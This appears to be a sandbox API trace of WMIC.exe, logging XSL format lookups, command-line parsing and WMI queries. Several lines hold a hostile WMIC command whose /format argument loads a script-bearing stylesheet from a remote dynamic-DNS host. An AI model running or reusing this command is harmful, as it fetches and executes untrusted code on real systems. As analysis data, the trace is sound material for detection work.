[0042.418] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.418] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0042.418] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.418] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0042.418] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0042.418] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.418] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0042.418] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.418] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.418] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.418] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=18, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.418] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="mof.xsl") returned 0x0
[0042.418] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.418] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.419] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0
[0042.419] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0042.419] SysStringLen (param_1="TABLE") returned 0x5
[0042.419] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0042.419] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.419] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0042.419] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.419] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0042.419] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0042.419] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0042.419] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0042.419] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.419] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0042.419] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.419] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.419] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.419] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=19, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.419] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="textvaluelist.xsl") returned 0x0
[0042.419] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.420] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.420] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0
[0042.420] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0042.420] SysStringLen (param_1="TABLE") returned 0x5
[0042.420] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0042.420] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.420] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0042.420] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.420] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0042.420] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0042.420] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0042.420] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0042.420] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.420] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.420] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.421] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=20, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.421] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="textvaluelist.xsl") returned 0x0
[0042.421] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.421] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.421] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0
[0042.421] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0042.421] SysStringLen (param_1="TABLE") returned 0x5
[0042.421] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0042.421] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.421] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0042.421] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.421] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0042.421] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0042.421] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0042.421] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0042.421] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0042.421] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0042.422] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.422] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.422] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.422] IUnknown:Release (This=0x5e8e80) returned 0x0
[0042.422] FreeThreadedDOMDocument:IUnknown:Release (This=0x5e8c58) returned 0x1
[0042.422] FreeThreadedDOMDocument:IUnknown:Release (This=0x5e4630) returned 0x0
[0042.422] GetCommandLineW () returned="C:\\Windows\\\\system32\\\\wbem\\\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" "
[0042.422] memcpy_s (in: _Destination=0x18ef00, _DestinationSize=0x15e, _Source=0x1f1644, _SourceSize=0x152 | out: _Destination=0x18ef00) returned 0x0
[0042.422] GetLocalTime (in: lpSystemTime=0x12fb10 | out: lpSystemTime=0x12fb10*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x1, wDay=0x16, wHour=0x3, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x30b))
[0042.422] _vsnwprintf (in: _Buffer=0x17d05b0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x12faf0 | out: _Buffer="10-22-2018T03:26:32") returned 19
[0042.422] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.422] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.422] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.423] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.423] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.423] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.423] lstrlenW (lpString="os") returned 2
[0042.423] _wcsicmp (_String1="os", _String2="\"NULL\"") returned 77
[0042.423] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.423] lstrlenW (lpString="get") returned 3
[0042.423] _wcsicmp (_String1="get", _String2="\"NULL\"") returned 69
[0042.423] memmove_s (in: _Destination=0x17d2ef8, _DestinationSize=0x4, _Source=0x17d2ed8, _SourceSize=0x4 | out: _Destination=0x17d2ef8) returned 0x0
[0042.423] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.423] lstrlenW (lpString="Kqncmv426") returned 9
[0042.423] _wcsicmp (_String1="Kqncmv426", _String2="\"NULL\"") returned 73
[0042.423] memmove_s (in: _Destination=0x18f098, _DestinationSize=0x8, _Source=0x17d2ef8, _SourceSize=0x8 | out: _Destination=0x18f098) returned 0x0
[0042.423] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.423] lstrlenW (lpString=",") returned 1
[0042.423] memmove_s (in: _Destination=0x18f0b0, _DestinationSize=0xc, _Source=0x18f098, _SourceSize=0xc | out: _Destination=0x18f0b0) returned 0x0
[0042.423] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.424] lstrlenW (lpString="lgiet286a") returned 9
[0042.424] _wcsicmp (_String1="lgiet286a", _String2="\"NULL\"") returned 74
[0042.424] memmove_s (in: _Destination=0x18e3d0, _DestinationSize=0x10, _Source=0x18f0b0, _SourceSize=0x10 | out: _Destination=0x18e3d0) returned 0x0
[0042.424] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.424] lstrlenW (lpString=",") returned 1
[0042.424] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.424] lstrlenW (lpString="UUFIKrncm") returned 9
[0042.424] _wcsicmp (_String1="UUFIKrncm", _String2="\"NULL\"") returned 83
[0042.424] memmove_s (in: _Destination=0x17d2f08, _DestinationSize=0x18, _Source=0x18e3d0, _SourceSize=0x18 | out: _Destination=0x17d2f08) returned 0x0
[0042.424] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.424] lstrlenW (lpString=",") returned 1
[0042.424] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.424] lstrlenW (lpString="numberofusers") returned 13
[0042.424] _wcsicmp (_String1="numberofusers", _String2="\"NULL\"") returned 76
[0042.424] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.424] lstrlenW (lpString="/") returned 1
[0042.424] memmove_s (in: _Destination=0x17d2f98, _DestinationSize=0x24, _Source=0x17d2f08, _SourceSize=0x24 | out: _Destination=0x17d2f98) returned 0x0
[0042.424] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.424] lstrlenW (lpString="ASSOC") returned 5
[0042.425] lstrlenW (lpString="format") returned 6
[0042.425] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
[0042.425] lstrlenW (lpString="FORMAT") returned 6
[0042.425] lstrlenW (lpString="format") returned 6
[0042.425] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="FORMAT", cchCount2=6) returned 2
[0042.425] lstrlenW (lpString="/") returned 1
[0042.425] lstrlenW (lpString="/") returned 1
[0042.425] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2
[0042.425] lstrlenW (lpString="format") returned 6
[0042.425] _wcsicmp (_String1="format", _String2="\"NULL\"") returned 68
[0042.425] lstrlenW (lpString="format") returned 6
[0042.425] lstrlenW (lpString="\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\"") returned 68
[0042.425] _wcsicmp (_String1="\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\"", _String2="\"NULL\"") returned -6
[0042.425] lstrlenW (lpString="\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\"") returned 68
[0042.425] lstrlenW (lpString="\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\"") returned 68
[0042.426] lstrlenW (lpString=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 133
[0042.427] lstrlenW (lpString="QUIT") returned 4
[0042.427] lstrlenW (lpString="os") returned 2
[0042.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="QUIT", cchCount2=4) returned 1
[0042.427] lstrlenW (lpString="EXIT") returned 4
[0042.427] lstrlenW (lpString="os") returned 2
[0042.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="EXIT", cchCount2=4) returned 3
[0042.427] WbemLocator:IUnknown:AddRef (This=0x630828) returned 0x2
[0042.427] lstrlenW (lpString="/") returned 1
[0042.427] lstrlenW (lpString="os") returned 2
[0042.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="/", cchCount2=1) returned 3
[0042.427] lstrlenW (lpString="-") returned 1
[0042.427] lstrlenW (lpString="os") returned 2
[0042.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="-", cchCount2=1) returned 3
[0042.427] lstrlenW (lpString="CLASS") returned 5
[0042.427] lstrlenW (lpString="os") returned 2
[0042.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="CLASS", cchCount2=5) returned 3
[0042.427] lstrlenW (lpString="PATH") returned 4
[0042.427] lstrlenW (lpString="os") returned 2
[0042.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="PATH", cchCount2=4) returned 1
[0042.427] lstrlenW (lpString="CONTEXT") returned 7
[0042.427] lstrlenW (lpString="os") returned 2
[0042.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="CONTEXT", cchCount2=7) returned 3
[0042.427] lstrlenW (lpString="os") returned 2
[0042.427] lstrlenW (lpString="os") returned 2
[0042.427] GetCurrentThreadId () returned 0x9a8
[0042.427] ??0CHString@@QAE@XZ () returned 0x12fa64
[0042.427] WbemLocator:IWbemLocator:ConnectServer (in: This=0x630828, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8dc1e0 | out: ppNamespace=0x8dc1e0*=0x63c74c) returned 0x0
[0043.675] CoSetProxyBlanket (pProxy=0x63c74c, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0043.675] ??1CHString@@QAE@XZ () returned 0x6f900504
[0043.675] GetCurrentThreadId () returned 0x9a8
[0043.675] ??0CHString@@QAE@XZ () returned 0x12f9fc
[0043.675] SysStringLen (param_1="root\\cli") returned 0x8
[0043.675] SysStringLen (param_1="\\") returned 0x1
[0043.675] SysStringLen (param_1="root\\cli\\") returned 0x9
[0043.675] SysStringLen (param_1="ms_409") returned 0x6
[0043.676] WbemLocator:IWbemLocator:ConnectServer (in: This=0x630828, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8dc1e4 | out: ppNamespace=0x8dc1e4*=0x63c7cc) returned 0x0
[0044.231] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.231] GetCurrentThreadId () returned 0x9a8
[0044.231] ??0CHString@@QAE@XZ () returned 0x12fa68
[0044.231] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0044.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x891f7c, cbMultiByte=-1, lpWideCharStr=0x18f6d8, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0044.232] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0044.232] SysStringLen (param_1="os") returned 0x2
[0044.232] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='os") returned 0x1e
[0044.232] SysStringLen (param_1="'") returned 0x1
[0044.232] IWbemServices:GetObject (in: This=0x63c74c, strObjectPath="MSFT_CliAlias.FriendlyName='os'", lFlags=0, pCtx=0x0, ppObject=0x12fa64*=0x0, ppCallResult=0x0 | out: ppObject=0x12fa64*=0x65c508, ppCallResult=0x0) returned 0x0
[0044.319] IWbemClassObject:Get (in: This=0x65c508, wszName="Target", lFlags=0, pVal=0x12fa24*(varType=0x0, wReserved1=0x12, wReserved2=0xe58c, wReserved3=0x8c, varVal1=0xffffffff, varVal2=0x89a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x12fa24*(varType=0x8, wReserved1=0x12, wReserved2=0xe58c, wReserved3=0x8c, varVal1="Select * from Win32_OperatingSystem", varVal2=0x89a03c), pType=0x0, plFlavor=0x0) returned 0x0
[0044.319] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
[0044.319] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
[0044.319] IWbemClassObject:Get (in: This=0x65c508, wszName="PWhere", lFlags=0, pVal=0x12fa24*(varType=0x0, wReserved1=0x12, wReserved2=0xe58c, wReserved3=0x8c, varVal1=0x21494c, varVal2=0x89a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x12fa24*(varType=0x8, wReserved1=0x12, wReserved2=0xe58c, wReserved3=0x8c, varVal1="", varVal2=0x89a03c), pType=0x0, plFlavor=0x0) returned 0x0
[0044.319] lstrlenW (lpString="") returned 0
[0044.319] lstrlenW (lpString="") returned 0
[0044.319] IWbemClassObject:Get (in: This=0x65c508, wszName="Connection", lFlags=0, pVal=0x12fa24*(varType=0x0, wReserved1=0x12, wReserved2=0xe58c, wReserved3=0x8c, varVal1=0x25d244, varVal2=0x89a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x12fa24*(varType=0xd, wReserved1=0x12, wReserved2=0xe58c, wReserved3=0x8c, varVal1=0x65c8c8, varVal2=0x89a03c), pType=0x0, plFlavor=0x0) returned 0x0
[0044.320] IUnknown:QueryInterface (in: This=0x65c8c8, riid=0x896b50*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x12fa5c | out: ppvObject=0x12fa5c*=0x65c8c8) returned 0x0
[0044.320] GetCurrentThreadId () returned 0x9a8
[0044.320] ??0CHString@@QAE@XZ () returned 0x12f9d8
[0044.320] IWbemClassObject:Get (in: This=0x65c8c8, wszName="Namespace", lFlags=0, pVal=0x12f9a8*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f9a8*(varType=0x8, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0044.320] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0044.320] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0044.320] IWbemClassObject:Get (in: This=0x65c8c8, wszName="Locale", lFlags=0, pVal=0x12f9a8*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1=0x25d244, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f9a8*(varType=0x8, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0044.320] lstrlenW (lpString="ms_409") returned 6
[0044.320] lstrlenW (lpString="ms_409") returned 6
[0044.320] IWbemClassObject:Get (in: This=0x65c8c8, wszName="User", lFlags=0, pVal=0x12f9a8*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1=0x25d244, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f9a8*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1=0x25d244, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0044.321] IWbemClassObject:Get (in: This=0x65c8c8, wszName="Password", lFlags=0, pVal=0x12f9a8*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1=0x25d244, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f9a8*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1=0x25d244, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0044.321] IWbemClassObject:Get (in: This=0x65c8c8, wszName="Server", lFlags=0, pVal=0x12f9a8*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1=0x25d244, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f9a8*(varType=0x8, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0044.321] lstrlenW (lpString=".") returned 1
[0044.321] lstrlenW (lpString=".") returned 1
[0044.321] IWbemClassObject:Get (in: This=0x65c8c8, wszName="Authority", lFlags=0, pVal=0x12f9a8*(varType=0x0, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1=0x25d244, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f9a8*(varType=0x1, wReserved1=0x0, wReserved2=0xf110, wReserved3=0x18, varVal1=0x25d244, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0044.321] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.321] IUnknown:Release (This=0x65c8c8) returned 0x1
[0044.321] GetCurrentThreadId () returned 0x9a8
[0044.321] ??0CHString@@QAE@XZ () returned 0x12f9d0
[0044.321] IWbemClassObject:Get (in: This=0x65c508, wszName="__RELPATH", lFlags=0, pVal=0x12f9b0*(varType=0x0, wReserved1=0x6e79, wReserved2=0x0, wReserved3=0x63, varVal1=0x0, varVal2=0x65c8c8), pType=0x0, plFlavor=0x0 | out: pVal=0x12f9b0*(varType=0x8, wReserved1=0x6e79, wReserved2=0x0, wReserved3=0x63, varVal1="MSFT_CliAlias.FriendlyName=\"OS\"", varVal2=0x65c8c8), pType=0x0, plFlavor=0x0) returned 0x0
[0044.321] GetCurrentThreadId () returned 0x9a8
[0044.321] ??0CHString@@QAE@XZ () returned 0x12f960
[0044.321] ??0CHString@@QAE@PBG@Z () returned 0x12f94c
[0044.321] ??0CHString@@QAE@ABV0@@Z () returned 0x12f8ec
[0044.321] ?Empty@CHString@@QAEXXZ () returned 0x6f900510
[0044.321] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x18f7d0
[0044.321] ?Find@CHString@@QBEHPBG@Z () returned 0x1b
[0044.321] ?Left@CHString@@QBE?AV1@H@Z () returned 0x12f8cc
[0044.322] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x12f8d0
[0044.322] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x12f94c
[0044.322] ??1CHString@@QAE@XZ () returned 0x1
[0044.322] ??1CHString@@QAE@XZ () returned 0x1
[0044.322] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x12f8c8
[0044.322] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x12f8ec
[0044.322] ??1CHString@@QAE@XZ () returned 0x1
[0044.322] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x18e3d0
[0044.322] ?Find@CHString@@QBEHPBG@Z () returned 0x2
[0044.322] ?Left@CHString@@QBE?AV1@H@Z () returned 0x12f8cc
[0044.322] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x12f8d0
[0044.322] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x12f94c
[0044.322] ??1CHString@@QAE@XZ () returned 0x820001
[0044.322] ??1CHString@@QAE@XZ () returned 0x7e0001
[0044.322] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x12f8c8
[0044.322] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x12f8ec
[0044.322] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.322] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x6f900504
[0044.322] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.322] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c
[0044.322] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17
[0044.322] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53
[0044.322] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"OS\\\"") returned 0x21
[0044.323] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"OS\\\"") returned 0x74
[0044.323] SysStringLen (param_1="\"") returned 0x1
[0044.323] IWbemServices:GetObject (in: This=0x63c7cc, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"OS\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x12f968*=0x0, ppCallResult=0x0 | out: ppObject=0x12f968*=0x65c960, ppCallResult=0x0) returned 0x0
[0044.336] IWbemClassObject:Get (in: This=0x65c960, wszName="Text", lFlags=0, pVal=0x12f914*(varType=0x0, wReserved1=0x21, wReserved2=0x494c, wReserved3=0x21, varVal1=0x3e, varVal2=0x8dc1e0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f914*(varType=0x2008, wReserved1=0x21, wReserved2=0x494c, wReserved3=0x21, varVal1=0x236eb8*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x250af0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x8dc1e0), pType=0x0, plFlavor=0x0) returned 0x0
[0044.336] SafeArrayGetLBound (in: psa=0x236eb8, nDim=0x1, plLbound=0x12f92c | out: plLbound=0x12f92c) returned 0x0
[0044.336] SafeArrayGetUBound (in: psa=0x236eb8, nDim=0x1, plUbound=0x12f928 | out: plUbound=0x12f928) returned 0x0
[0044.336] SafeArrayGetElement (in: psa=0x236eb8, rgIndices=0x12f98c, pv=0x12f954 | out: pv=0x12f954) returned 0x0
[0044.336] SysStringLen (param_1="Installed Operating System/s management. ") returned 0x29
[0044.336] IUnknown:Release (This=0x65c960) returned 0x0
[0044.336] ??1CHString@@QAE@XZ () returned 0x1
[0044.336] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.336] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.336] lstrlenW (lpString="Installed Operating System/s management. ") returned 41
[0044.336] lstrlenW (lpString="Installed Operating System/s management. ") returned 41
[0044.336] IUnknown:Release (This=0x65c508) returned 0x0
[0044.337] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.337] lstrlenW (lpString="PATH") returned 4
